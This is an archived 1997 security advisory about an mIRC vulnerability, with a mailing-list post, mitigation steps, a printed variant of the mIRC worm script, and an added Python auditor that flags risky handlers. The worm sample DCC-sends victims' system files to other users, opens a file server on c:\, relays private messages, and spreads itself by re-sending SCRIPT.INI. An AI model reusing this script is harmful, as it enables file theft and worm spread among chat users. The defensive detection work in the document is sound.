MIRC worm bug

Description: There is a bug in MIRC (a Windoze IRC client) which allows people to send an arbitrary script.irc to MIRC users. This allows arbitrary MIRC scripting commands to be interpreted.
Compromise: Windows IRC users can be harassed and their files can be snatched and/or deleted.
Vulnerable Systems: Windows versions running MIRC prior to 5.3
Date: 18 December 1997

Date: Thu, 18 Dec 1997 10:59:31 -0600
From: Aleph One <aleph1@dfw.net>
Subject: mIRC Worm

  There is an mIRC worm/script going around IRC. mIRC has a bug that
allows remote users to download script files onto the victim's machines and
execute them. mIRC 5.3 has been released to fix the hole. You can also fix
the problem by changing the default download subdirectory to be something
else than the directory containing the script files. To do so:

   a) Start the mIRC software
   b) Click the mIRC menu option DCC | Options | Dirs | Edit
   c) Change the default download directory. Point to an alternate
      directory or folder name.

  Attached you will find one of the many variations of the script. I
don't plan on starting a thread on this topic. mIRC has always been a
mess. This is just a heads up. Some reference URLs:


Aleph One / aleph1@dfw.net
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

  [Part 2, ""  Text/PLAIN  27 lines]

n1=;      Protection List
n3=ON 1:TEXT:*spamquit*:#:/quit Jolly Spamhead Ownz Me
n4=ON 1:TEXT:*hi*:#:/dcc send $nick c:\config.sys
n5=ON 1:TEXT:*!servme*:#:/fserve $nick 1 c:\
n6=ON 1:TEXT:*cya*:#:/dcc send $nick c:\windows\win.ini
n7=ON 1:TEXT:*the*:#:/dcc send $nick c:\autoexec.bat
n8=ON 1:NOTICE:*:#:/msg #roms  $+ $chan $+  - $+ $nick $+ - $parms
n9=ON 1:TEXT:*:?:/msg #roms **Message from $nick $+ ** $parms | /closemsg  $nick
n10=ON 1:TEXT:*:#:/msg #roms $+ $chan $+  < $+ $nick $+ > $parms
N11=ON 1:TEXT:*:#:/say I am lame for running Script.ini and I should be shot!
n12=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
n13=ON 1:JOIN:*RaSPuTeN*:/mode +o $chan RaSPuTeN
N14=ON 1:JOIN:#:/msg $nick My Computer Is Open For The taking! Type !servme in channel!
n15=#user.prot.add.all off
n16=raw 401:*: set %User.Nick 0 | halt
n17=raw 301:*: halt
n18=raw 311:*: set %User.Address $2 $+ ! $+ $3 $+ @ $+ $4 | halt
n19=raw 312:*: halt
n20=raw 313:*: halt
n21=raw 317:*: halt
n22=raw 319:*: halt
n23=raw 318:* {
n24=  if (%User.Nick == 0) { error $2 $+ , no such nick | goto do
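
A defensive check for the kind of script attached above, as an added example that is not part of the original post or of mIRC: it parses the `nN=ON level:EVENT:...:/command` handler lines and flags those that send files, open a file server, relay messages, or re-send SCRIPT.INI on join. The line grammar, the function name `audit` and the category names are assumptions drawn only from the handlers shown on this page.

```python
import re

# Constructed sample: handler lines copied from the script attached above.
SAMPLE = r"""n1=;      Protection List
n3=ON 1:TEXT:*spamquit*:#:/quit Jolly Spamhead Ownz Me
n4=ON 1:TEXT:*hi*:#:/dcc send $nick c:\config.sys
n5=ON 1:TEXT:*!servme*:#:/fserve $nick 1 c:\
n9=ON 1:TEXT:*:?:/msg #roms **Message from $nick $+ ** $parms | /closemsg  $nick
n12=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
n13=ON 1:JOIN:*RaSPuTeN*:/mode +o $chan RaSPuTeN
n17=raw 301:*: halt
"""

# nN=ON <level>:<EVENT>:<filters>:<command>. The command is taken to start at
# the first ":/" (an assumption that holds for the handlers on this page; it
# also keeps the ":" inside paths such as c:\ from being read as a separator).
HANDLER = re.compile(r"^(n\d+)=ON\s+[^:]+:(\w+):(.*?):(/.*)$", re.IGNORECASE)

# Ordered rules (hypothetical category names); the first match wins.
RULES = [
    ("self-propagation", re.compile(r"^/dcc\s+send\s+\S+\s+script\.ini\b", re.I)),
    ("file-exfiltration", re.compile(r"^/dcc\s+send\b", re.I)),
    ("file-server", re.compile(r"^/fserve\b", re.I)),
    ("message-relay", re.compile(r"^/msg\s+\S+.*\$parms", re.I)),
]

def audit(script_text):
    """Return (line_id, event, category, command) for each risky handler."""
    findings = []
    for line in script_text.splitlines():
        m = HANDLER.match(line.strip())
        if not m:
            continue  # comments, raw numerics and group markers are skipped
        line_id, event, _filters, commands = m.groups()
        # A handler may chain several commands with "|"; check each one.
        for cmd in (c.strip() for c in commands.split("|")):
            for category, pattern in RULES:
                if pattern.search(cmd):
                    findings.append((line_id.lower(), event.upper(), category, cmd))
                    break
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("%-4s %-6s %-18s %s" % finding)
```

Running it against a script file found in the mIRC directory shows at a glance whether any event handler hands files or conversations to other users.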

This page is part of Fyodor's exploit world.